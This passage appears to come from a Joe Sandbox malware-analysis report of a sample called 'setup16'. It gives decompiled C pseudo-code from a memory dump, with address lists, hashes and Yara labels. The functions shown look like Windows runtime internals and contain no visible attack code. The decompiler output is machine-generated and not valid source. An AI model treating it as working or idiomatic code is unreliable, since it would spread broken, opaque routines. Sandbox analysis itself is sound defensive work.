			}


















                                                                                                                                                                                                        0x049c9100
                                                                                                                                                                                                        0x049c9100
                                                                                                                                                                                                        0x049c9100
                                                                                                                                                                                                        0x049c9100
                                                                                                                                                                                                        0x049c9102
                                                                                                                                                                                                        0x049c9107
                                                                                                                                                                                                        0x049c910c
                                                                                                                                                                                                        0x049c9110
                                                                                                                                                                                                        0x049c9115
                                                                                                                                                                                                        0x049c9136
                                                                                                                                                                                                        0x049c9143
                                                                                                                                                                                                        0x04a237e4
                                                                                                                                                                                                        0x04a237e4
                                                                                                                                                                                                        0x049c9149
                                                                                                                                                                                                        0x049c914e
                                                                                                                                                                                                        0x049c914e
                                                                                                                                                                                                        0x049c9117
                                                                                                                                                                                                        0x049c911d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c911f
                                                                                                                                                                                                        0x049c9125
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c9151
                                                                                                                                                                                                        0x049c9158
                                                                                                                                                                                                        0x049c915d
                                                                                                                                                                                                        0x049c9161
                                                                                                                                                                                                        0x049c9168
                                                                                                                                                                                                        0x04a23715
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c916e
                                                                                                                                                                                                        0x049c916e
                                                                                                                                                                                                        0x049c9175
                                                                                                                                                                                                        0x049c9177
                                                                                                                                                                                                        0x049c917e
                                                                                                                                                                                                        0x049c917f
                                                                                                                                                                                                        0x049c9182
                                                                                                                                                                                                        0x049c9182
                                                                                                                                                                                                        0x049c9187
                                                                                                                                                                                                        0x049c9187
                                                                                                                                                                                                        0x049c918a
                                                                                                                                                                                                        0x049c918d
                                                                                                                                                                                                        0x049c918f
                                                                                                                                                                                                        0x049c9192
                                                                                                                                                                                                        0x049c9195
                                                                                                                                                                                                        0x049c9198
                                                                                                                                                                                                        0x049c9198
                                                                                                                                                                                                        0x049c9198
                                                                                                                                                                                                        0x049c919a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2371f
                                                                                                                                                                                                        0x04a23721
                                                                                                                                                                                                        0x04a23727
                                                                                                                                                                                                        0x04a2372f
                                                                                                                                                                                                        0x04a23733
                                                                                                                                                                                                        0x04a23735
                                                                                                                                                                                                        0x04a23738
                                                                                                                                                                                                        0x04a2373b
                                                                                                                                                                                                        0x04a2373d
                                                                                                                                                                                                        0x04a23740
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a23746
                                                                                                                                                                                                        0x04a23749
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2374f
                                                                                                                                                                                                        0x04a23751
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a23757
                                                                                                                                                                                                        0x04a23759
                                                                                                                                                                                                        0x04a2375c
                                                                                                                                                                                                        0x04a2375c
                                                                                                                                                                                                        0x04a2375e
                                                                                                                                                                                                        0x04a2375e
                                                                                                                                                                                                        0x04a23761
                                                                                                                                                                                                        0x04a23764
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a23766
                                                                                                                                                                                                        0x04a23768
                                                                                                                                                                                                        0x04a237a3
                                                                                                                                                                                                        0x04a237a3
                                                                                                                                                                                                        0x04a237a5
                                                                                                                                                                                                        0x04a237a7
                                                                                                                                                                                                        0x04a237ad
                                                                                                                                                                                                        0x04a237b0
                                                                                                                                                                                                        0x04a237b2
                                                                                                                                                                                                        0x04a237bc
                                                                                                                                                                                                        0x04a237c2
                                                                                                                                                                                                        0x04a237c2
                                                                                                                                                                                                        0x04a237b2
                                                                                                                                                                                                        0x049c9187
                                                                                                                                                                                                        0x049c9187
                                                                                                                                                                                                        0x049c918a
                                                                                                                                                                                                        0x049c918d
                                                                                                                                                                                                        0x049c918f
                                                                                                                                                                                                        0x049c9192
                                                                                                                                                                                                        0x049c9195
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c9195
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c9187
                                                                                                                                                                                                        0x04a2376a
                                                                                                                                                                                                        0x04a2376a
                                                                                                                                                                                                        0x04a2376c
                                                                                                                                                                                                        0x04a2376c
                                                                                                                                                                                                        0x04a2376f
                                                                                                                                                                                                        0x04a23775
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a23777
                                                                                                                                                                                                        0x04a23779
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a23782
                                                                                                                                                                                                        0x04a23787
                                                                                                                                                                                                        0x04a23789
                                                                                                                                                                                                        0x04a23790
                                                                                                                                                                                                        0x04a23790
                                                                                                                                                                                                        0x04a2378b
                                                                                                                                                                                                        0x04a2378b
                                                                                                                                                                                                        0x04a2378b
                                                                                                                                                                                                        0x04a23792
                                                                                                                                                                                                        0x04a23795
                                                                                                                                                                                                        0x04a23795
                                                                                                                                                                                                        0x04a23798
                                                                                                                                                                                                        0x04a23798
                                                                                                                                                                                                        0x04a2379b
                                                                                                                                                                                                        0x04a2379b
                                                                                                                                                                                                        0x049c91a3
                                                                                                                                                                                                        0x049c91a9
                                                                                                                                                                                                        0x049c91b0
                                                                                                                                                                                                        0x049c91b4
                                                                                                                                                                                                        0x049c91b4
                                                                                                                                                                                                        0x049c91bb
                                                                                                                                                                                                        0x049c91c0
                                                                                                                                                                                                        0x049c91c5
                                                                                                                                                                                                        0x049c91c7
                                                                                                                                                                                                        0x04a237da
                                                                                                                                                                                                        0x049c91cd
                                                                                                                                                                                                        0x049c91cd
                                                                                                                                                                                                        0x049c91cd
                                                                                                                                                                                                        0x049c91d2
                                                                                                                                                                                                        0x049c91d5
                                                                                                                                                                                                        0x049c9239
                                                                                                                                                                                                        0x049c9239
                                                                                                                                                                                                        0x049c91d7
                                                                                                                                                                                                        0x049c91db
                                                                                                                                                                                                        0x049c91e1
                                                                                                                                                                                                        0x049c91e7
                                                                                                                                                                                                        0x049c91fd
                                                                                                                                                                                                        0x049c9203
                                                                                                                                                                                                        0x049c921e
                                                                                                                                                                                                        0x049c9223
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c9223
                                                                                                                                                                                                        0x049c9205
                                                                                                                                                                                                        0x049c9208
                                                                                                                                                                                                        0x049c920c
                                                                                                                                                                                                        0x049c9214
                                                                                                                                                                                                        0x049c9214
                                                                                                                                                                                                        0x049c91e9
                                                                                                                                                                                                        0x049c91e9
                                                                                                                                                                                                        0x049c91ee
                                                                                                                                                                                                        0x049c91f3
                                                                                                                                                                                                        0x049c91f3
                                                                                                                                                                                                        0x049c91f3
                                                                                                                                                                                                        0x049c91e7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c91db
                                                                                                                                                                                                        0x049c9187
                                                                                                                                                                                                        0x049c9168

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 224236ec6a497f3be8dbd16d48b58f4c795dcb7fd21f5f7d83f939b7ac67852a
                                                                                                                                                                                                        • Instruction ID: 2ac1e816a31729646a889aaccc9bb4dde3d6d25536ac159b64e02b46102c66f8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 224236ec6a497f3be8dbd16d48b58f4c795dcb7fd21f5f7d83f939b7ac67852a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B731C0B1A00284DFEB21DF68C589BACB7F5BB49324F18856DC40467251D338B980CB92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049E0050 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E049E0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x4abd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E049F9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E04A0B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04A98A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E049F9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x4abb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                                                                                                                                                        0x049e0055
                                                                                                                                                                                                        0x049e005d
                                                                                                                                                                                                        0x049e0062
                                                                                                                                                                                                        0x049e006c
                                                                                                                                                                                                        0x049e006f
                                                                                                                                                                                                        0x049e0074
                                                                                                                                                                                                        0x049e007a
                                                                                                                                                                                                        0x049e007a
                                                                                                                                                                                                        0x049e0080
                                                                                                                                                                                                        0x049e0080
                                                                                                                                                                                                        0x049e0087
                                                                                                                                                                                                        0x049e008d
                                                                                                                                                                                                        0x049e008f
                                                                                                                                                                                                        0x049e0093
                                                                                                                                                                                                        0x049e0095
                                                                                                                                                                                                        0x049e009b
                                                                                                                                                                                                        0x049e00f8
                                                                                                                                                                                                        0x049e00fb
                                                                                                                                                                                                        0x049e00fc
                                                                                                                                                                                                        0x049e00ff
                                                                                                                                                                                                        0x049e0108
                                                                                                                                                                                                        0x049e0108
                                                                                                                                                                                                        0x049e00a2
                                                                                                                                                                                                        0x049e00a6
                                                                                                                                                                                                        0x049e00b3
                                                                                                                                                                                                        0x049e00bc
                                                                                                                                                                                                        0x049e00c5
                                                                                                                                                                                                        0x049e00ca
                                                                                                                                                                                                        0x04a2c01e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2c02d
                                                                                                                                                                                                        0x049e00d5
                                                                                                                                                                                                        0x049e00d9
                                                                                                                                                                                                        0x04a2c03d
                                                                                                                                                                                                        0x04a2c046
                                                                                                                                                                                                        0x04a2c046
                                                                                                                                                                                                        0x049e00df
                                                                                                                                                                                                        0x049e00e2
                                                                                                                                                                                                        0x049e00ea
                                                                                                                                                                                                        0x049e00ef
                                                                                                                                                                                                        0x049e00f2
                                                                                                                                                                                                        0x049e00f6
                                                                                                                                                                                                        0x049e0111
                                                                                                                                                                                                        0x049e0117
                                                                                                                                                                                                        0x049e0117
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e00f6
                                                                                                                                                                                                        0x049e00d0
                                                                                                                                                                                                        0x049e00d0
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 829eccee1e27b3890a5eb9afdca2800f49b3766ccba454796bd1c21c684823d3
                                                                                                                                                                                                        • Instruction ID: 1c7b7fc1d225f9db919b44d1443f84788da7dbb2055f1684273dff2888acd6d6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 829eccee1e27b3890a5eb9afdca2800f49b3766ccba454796bd1c21c684823d3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6318E31601B14CFD722CF29C944BAAB3E5FF88719F14496DE59687A90EB75BC01CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A46C0A Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E04A46C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E049E7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4ab7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L049E4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E04A0F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E049E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04A09AE0();
						_t23 = L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                                                                                                                                                        0x04a46c0a
                                                                                                                                                                                                        0x04a46c0f
                                                                                                                                                                                                        0x04a46c10
                                                                                                                                                                                                        0x04a46c13
                                                                                                                                                                                                        0x04a46c15
                                                                                                                                                                                                        0x04a46c19
                                                                                                                                                                                                        0x04a46c1c
                                                                                                                                                                                                        0x04a46c21
                                                                                                                                                                                                        0x04a46c28
                                                                                                                                                                                                        0x04a46c3a
                                                                                                                                                                                                        0x04a46c2a
                                                                                                                                                                                                        0x04a46c33
                                                                                                                                                                                                        0x04a46c33
                                                                                                                                                                                                        0x04a46c3f
                                                                                                                                                                                                        0x04a46c48
                                                                                                                                                                                                        0x04a46c4d
                                                                                                                                                                                                        0x04a46c60
                                                                                                                                                                                                        0x04a46c65
                                                                                                                                                                                                        0x04a46c69
                                                                                                                                                                                                        0x04a46c73
                                                                                                                                                                                                        0x04a46c79
                                                                                                                                                                                                        0x04a46c7f
                                                                                                                                                                                                        0x04a46c86
                                                                                                                                                                                                        0x04a46c90
                                                                                                                                                                                                        0x04a46c94
                                                                                                                                                                                                        0x04a46ca6
                                                                                                                                                                                                        0x04a46cb2
                                                                                                                                                                                                        0x04a46cbd
                                                                                                                                                                                                        0x04a46cbd
                                                                                                                                                                                                        0x04a46cc3
                                                                                                                                                                                                        0x04a46cc7
                                                                                                                                                                                                        0x04a46ccb
                                                                                                                                                                                                        0x04a46cd0
                                                                                                                                                                                                        0x04a46cd1
                                                                                                                                                                                                        0x04a46ce2
                                                                                                                                                                                                        0x04a46ce2
                                                                                                                                                                                                        0x04a46c69
                                                                                                                                                                                                        0x04a46ced

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 80d3524f3124a4653ea3fe050dc7d02aaee4207bc0ab98146bd726de777f38aa
                                                                                                                                                                                                        • Instruction ID: 24d1da8fa4fb223961e7556de47db6ffdc55cd888be0e5c45d65281bf9ad5897
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80d3524f3124a4653ea3fe050dc7d02aaee4207bc0ab98146bd726de777f38aa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E921BCB1A00644AFD716DF69D980F6AB7B8FF88704F0440AAF804D7791D638ED50CBA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A090AF Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E04A090AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E04A1D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E049FE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L049E4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E04A0F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E049FA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                                                                                                                                                        0x04a090af
                                                                                                                                                                                                        0x04a090b8
                                                                                                                                                                                                        0x04a090bb
                                                                                                                                                                                                        0x04a090bf
                                                                                                                                                                                                        0x04a090c2
                                                                                                                                                                                                        0x04a090c2
                                                                                                                                                                                                        0x04a090c8
                                                                                                                                                                                                        0x04a090cb
                                                                                                                                                                                                        0x04a090cd
                                                                                                                                                                                                        0x04a414d7
                                                                                                                                                                                                        0x04a414eb
                                                                                                                                                                                                        0x04a414eb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a414eb
                                                                                                                                                                                                        0x04a414db
                                                                                                                                                                                                        0x04a414e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a414f2
                                                                                                                                                                                                        0x04a414e8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a414e8
                                                                                                                                                                                                        0x04a090d8
                                                                                                                                                                                                        0x04a090da
                                                                                                                                                                                                        0x04a090dd
                                                                                                                                                                                                        0x04a090e5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a09139
                                                                                                                                                                                                        0x04a090fa
                                                                                                                                                                                                        0x04a090fe
                                                                                                                                                                                                        0x04a09142
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a09142
                                                                                                                                                                                                        0x04a09104
                                                                                                                                                                                                        0x04a09107
                                                                                                                                                                                                        0x04a0910b
                                                                                                                                                                                                        0x04a09110
                                                                                                                                                                                                        0x04a09118
                                                                                                                                                                                                        0x04a09147
                                                                                                                                                                                                        0x04a09148
                                                                                                                                                                                                        0x04a0914f
                                                                                                                                                                                                        0x04a09150
                                                                                                                                                                                                        0x04a09151
                                                                                                                                                                                                        0x04a09152
                                                                                                                                                                                                        0x04a09156
                                                                                                                                                                                                        0x04a0915d
                                                                                                                                                                                                        0x04a09160
                                                                                                                                                                                                        0x04a09168
                                                                                                                                                                                                        0x04a0916c
                                                                                                                                                                                                        0x04a091bc
                                                                                                                                                                                                        0x04a091be
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a091be
                                                                                                                                                                                                        0x04a0916e
                                                                                                                                                                                                        0x04a09173
                                                                                                                                                                                                        0x04a09176
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a0917c
                                                                                                                                                                                                        0x04a09180
                                                                                                                                                                                                        0x04a091b5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a091b5
                                                                                                                                                                                                        0x04a09182
                                                                                                                                                                                                        0x04a09185
                                                                                                                                                                                                        0x04a09189
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a0918e
                                                                                                                                                                                                        0x04a09190
                                                                                                                                                                                                        0x04a09198
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a091a0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a091ad
                                                                                                                                                                                                        0x04a091ad
                                                                                                                                                                                                        0x04a091b0
                                                                                                                                                                                                        0x04a091b1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a09185
                                                                                                                                                                                                        0x04a0911a
                                                                                                                                                                                                        0x04a0911c
                                                                                                                                                                                                        0x04a0911f
                                                                                                                                                                                                        0x04a09125
                                                                                                                                                                                                        0x04a09127
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                                                                                        • Instruction ID: 2c721f1c7a6e72404bfd386d64e9d52453d22710bd2fbc0570df9ecd0d34484c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F217FB1A01204EFDB20DF59D944AAAB7FCEB88314F14C86AE945A7251D270B9408B90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F3B7A Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 59%
                                                                                                                                                                                                        			E049F3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x4ab84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x4ab84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L049E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4ab84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E04A0AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E04A0FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4ab84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x4ab84c4; // 0x0
					L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                                                                                                                                                        0x049f3b89
                                                                                                                                                                                                        0x049f3b96
                                                                                                                                                                                                        0x049f3ba1
                                                                                                                                                                                                        0x049f3bab
                                                                                                                                                                                                        0x049f3bb5
                                                                                                                                                                                                        0x049f3bb9
                                                                                                                                                                                                        0x04a36298
                                                                                                                                                                                                        0x049f3bbf
                                                                                                                                                                                                        0x049f3bc2
                                                                                                                                                                                                        0x049f3bc3
                                                                                                                                                                                                        0x049f3bc9
                                                                                                                                                                                                        0x049f3bca
                                                                                                                                                                                                        0x049f3bcc
                                                                                                                                                                                                        0x049f3bcd
                                                                                                                                                                                                        0x049f3bd4
                                                                                                                                                                                                        0x049f3bd6
                                                                                                                                                                                                        0x049f3bdb
                                                                                                                                                                                                        0x049f3bea
                                                                                                                                                                                                        0x049f3bf7
                                                                                                                                                                                                        0x049f3bfb
                                                                                                                                                                                                        0x049f3bff
                                                                                                                                                                                                        0x049f3c09
                                                                                                                                                                                                        0x049f3c0a
                                                                                                                                                                                                        0x049f3c0b
                                                                                                                                                                                                        0x049f3c0f
                                                                                                                                                                                                        0x049f3c14
                                                                                                                                                                                                        0x049f3c18
                                                                                                                                                                                                        0x049f3c18
                                                                                                                                                                                                        0x049f3bfb
                                                                                                                                                                                                        0x049f3c1b
                                                                                                                                                                                                        0x049f3c30
                                                                                                                                                                                                        0x049f3c30
                                                                                                                                                                                                        0x049f3c3d

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 7bd90213efb1621189cc8e95e95e5bed1dbf044292bceb7a8418cde6270552d3
